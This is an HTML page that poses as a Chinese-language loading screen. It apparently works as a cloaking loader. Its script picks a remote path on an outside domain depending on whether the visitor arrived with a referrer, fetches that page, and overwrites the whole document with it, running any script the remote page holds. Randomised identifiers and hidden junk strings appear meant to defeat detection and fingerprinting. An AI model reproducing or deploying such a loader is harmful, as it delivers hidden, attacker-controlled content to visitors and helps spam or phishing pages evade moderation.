<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .qIJ7UZ {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .qIJ7UZ .IHQQpPmEa3 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .qIJ7UZ .content {
            line-height: 50px;
            text-align: center
        }

        .qIJ7UZ .img {
            width: 100%
        }

        .qIJ7UZ .jTDDwvP {
            text-align: center
        }

        .qIJ7UZ .jTDDwvP span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .qIJ7UZ .jTDDwvP span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .qIJ7UZ .jTDDwvP span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .qIJ7UZ .jTDDwvP span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .qIJ7UZ .jTDDwvP span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .qIJ7UZ .jTDDwvP span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .qIJ7UZ .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function wv3M2QAWtA6c8(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Qio1oq = wv3M2QAWtA6c8('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Qio1oq +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Qio1oq +".html?a=share";
		}
		
        CS9bD5jE=url+"#"+new Date().getTime();
        CS9bD5jE && function() {
            $.get(CS9bD5jE, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>mkk9X06yp9YkAW1tL50Y4nBLxl</p>
<a  href='#' style='display:none'>AXceQPEdVzdLBXcRRP7DtE4cII2D3JfuSr</a>
<h1 style='display:none' >Cj1n45vxZMbyjxQksu8sjOlEi4iesEpBfm2gezvApcjJHjYTyi1Kag</h1>
<a  href='#' style='display:none'>AXceQPEdVzdLBXcRRP7DtE4cII2D3JfuSr</a>
<ul style='display:none' >sCflQPrt4dMk8WYXLExYAOOQPnt5OS5zmIzJ</ul>
<p  style='display:none'>mkk9X06yp9YkAW1tL50Y4nBLxl</p>
<div style='display:none'>UAOwT9h9mFy8mdSBOWz8Sw0ncvFOKWiEDF28ZRTgYP7EmCuq9GvRW2</div>
<span style='display:none'>XKrEathfBI5XSvW6ZX9sJ7cJruWEk</span><div class="qIJ7UZ">
    <div class="IHQQpPmEa3">
        <div class="jTDDwvP">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >dsso19ly7qJLIThntJBUdTFE1RPsjYoIvCrv9Q0NFS1O0wQevo8XLja</ul>
<li style='display:none' >YM97Fe7pz2jD5rEzYbqs0HxgriuUM1QNcXNkG7VWzGoWz8Uwe2Kq0ImjHUZHfy5gu3pmuMvpCPk9tcL5JGkUQZoFrkkpPL</li>
<p  style='display:none'>jXTC2w8AsChYH7ZJnSiEN5Uz1pvOzycqLQsD6Ilf</p>
<ul style='display:none' >dsso19ly7qJLIThntJBUdTFE1RPsjYoIvCrv9Q0NFS1O0wQevo8XLja</ul>
<li style='display:none' >YM97Fe7pz2jD5rEzYbqs0HxgriuUM1QNcXNkG7VWzGoWz8Uwe2Kq0ImjHUZHfy5gu3pmuMvpCPk9tcL5JGkUQZoFrkkpPL</li>
<a  href='#' style='display:none'>YrJ39q44UxShni88Gc7xMiSK0YQYB4G4bhTpIyO6i5gl6yalDbsEiKAyQBuEDDuEjZeldWccQC3eqSbbRPQLbf</a></body>
</html>